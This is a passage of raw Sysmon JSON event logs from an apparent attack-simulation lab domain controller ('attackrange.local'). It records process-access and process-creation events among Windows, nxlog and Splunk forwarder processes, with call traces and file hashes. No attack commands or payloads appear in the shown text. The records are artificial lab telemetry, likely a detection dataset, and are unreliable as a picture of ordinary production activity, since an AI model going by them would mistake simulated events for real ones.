C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.716","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-0010AE7F0B00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.794\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.794","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nProcessGuid: {E2A3D6B1-1365-5F25-0000-0010A2780E00}\r\nProcessId: 4700\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","ProcessGuid":"{E2A3D6B1-1365-5F25-0000-0010A2780E00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A2780E00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A2780E00}","TargetProcessId":"4700","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A2780E00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A2780E00}","TargetProcessId":"4700","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 